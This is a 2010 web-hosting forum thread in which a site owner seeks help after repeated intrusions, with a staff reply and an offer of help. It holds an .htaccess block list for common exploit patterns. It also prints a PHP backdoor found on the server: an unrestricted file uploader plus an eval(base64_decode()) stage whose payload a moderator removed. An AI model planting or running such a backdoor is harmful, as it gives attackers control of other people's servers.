The Community Forums

Interact with an entire community of cPanel & WHM users!

Help, Palestinian hacker is hell-bent on taking me down

Discussion in 'General Discussion' started by ericinne, Oct 8, 2010.

  1. ericinne

    ericinne Registered

    Joined:
    Oct 8, 2010
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    1
    This guy keeps getting control of my cPanel on my server.

    He's been able to modify my SQL tables, delete files, change the index, lock me out of cPanel, block my IP range, etc.

    I changed all my passwords to 25-character alphanumeric ones, and I inserted the following into my .htaccess:

    Code:
    ########## Begin - Rewrite rules to block out some common exploits
    #
    # mod_rewrite must be switched on before any RewriteCond/RewriteRule is read
    RewriteEngine On
    #
    # Block out any script trying to set a mosConfig value through the URL
    RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
    # Block out any script trying to base64_encode crap to send via URL
    RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
    # Block out any script that includes a <script> tag in URL
    RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
    # Block out any script trying to set a PHP GLOBALS variable via URL
    RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
    # Block out any script trying to modify a _REQUEST variable via URL
    RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
    # Send all blocked requests to homepage with 403 Forbidden error!
    # (with the F flag Apache ignores the index.php target and answers 403 directly)
    RewriteRule ^(.*)$ index.php [F,L]
    #
    ########## End - Rewrite rules to block out some common exploits
    I had phpBB do an audit and they found no problems; my host is useless and keeps telling me to scan my PC for viruses (yeah, right).

    But still this guy keeps getting in.

    The first time, he used a c99.php shell exploit, but I'm pretty sure I have that hole fixed.

    The second time, I noticed an added user name for the FTP account. I deleted it, but he is still getting in.

    Today as I got home, I checked and noticed I was locked out of the site via an IP block from cPanel.

    That was the 4th time.

    I need someone to give me some SERIOUS help here keeping this guy out.

    He's part of the Gaza Hacker crew and has threatened to keep hacking me for insulting Islam of all things.
     
  2. ericinne

    ericinne Registered

    Joined:
    Oct 8, 2010
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    1
    If it helps, I discovered the following file in my home dir:

    PHP:
    <html>

    <head>
      <title>beleberda</title>
    </head>

    <body>
    <?php
    // Number of upload slots; whoever calls the script controls it via ?Nfiles=N (default 5)
    if(empty($_GET['Nfiles'])) $Nfiles = 5; else $Nfiles = $_GET['Nfiles'];
    if($_FILES['userfile']['tmp_name'][0] != '') {
        for($i = 0; $i < $Nfiles && $_FILES['userfile']['tmp_name'][$i] != ''; $i++) {
            // Uploads are written next to the script itself, so an uploaded .php is immediately reachable
            $uploaddir = dirname(__FILE__); //'/var/www/uploads/';
            // Only basename() is applied; no extension or content check of any kind
            $uploadfile = $uploaddir . '/' . basename($_FILES['userfile']['name'][$i]);
            print "<pre>";
            if (move_uploaded_file($_FILES['userfile']['tmp_name'][$i], $uploadfile)) {
                print "File is valid, and was successfully uploaded. ";
                //print_r($_FILES);
            } else {
                print "Possible file upload attack!  Here's some debugging info:\n";
                //print_r($_FILES);
            }
            print "</pre>";
        }
    }
    // Second stage: a base64-encoded payload fed straight to eval() on every request.
    // The encoded string was replaced by a moderator before the post was published.
    $connection = "killedbase64code";

    echo eval(base64_decode($connection));
    ?>
    <form action="<?php echo $_SERVER['PHP_SELF'].'?Nfiles='.$Nfiles ?>" method="post" enctype="multipart/form-data">
      Send beleberda:<br>
      <?php for($i = 0; $i < $Nfiles; $i++) { echo '<input name="userfile[]" type="file"><br>'; } ?>
      <input type="submit" value="Send files">
    </form>


    </body>

    </html>
     
    #2 ericinne, Oct 8, 2010
    Last edited by a moderator: Oct 8, 2010
  3. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,478
    Likes Received:
    203
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    This is sound advice and I agree with it. If your computer is infected somehow, every time you change your password and then login to your account, he may be receiving that new password from you.

    If you've already scanned and seem to be clean, scan again with an online scanner. Install http://www.malwarebytes.org/, update it, and then do a full scan with it as well.



    Welcome to the WWW. Insulting others can get you in trouble here the same way it can get you in trouble at your local bar.
    The Core Rules of Netiquette

    If you're not sure that your server is secure, you might want to seek advice from a professional.
     
  4. elialum

    elialum Member

    Joined:
    Sep 10, 2008
    Messages:
    23
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Israel
    cPanel Access Level:
    DataCenter Provider
    Hi,

    I will be glad to help you (free of charge).
    How can I contact you? Can you PM me your details?

    Take care,
    Eli Alum,
    Jerusalem, Israel.
     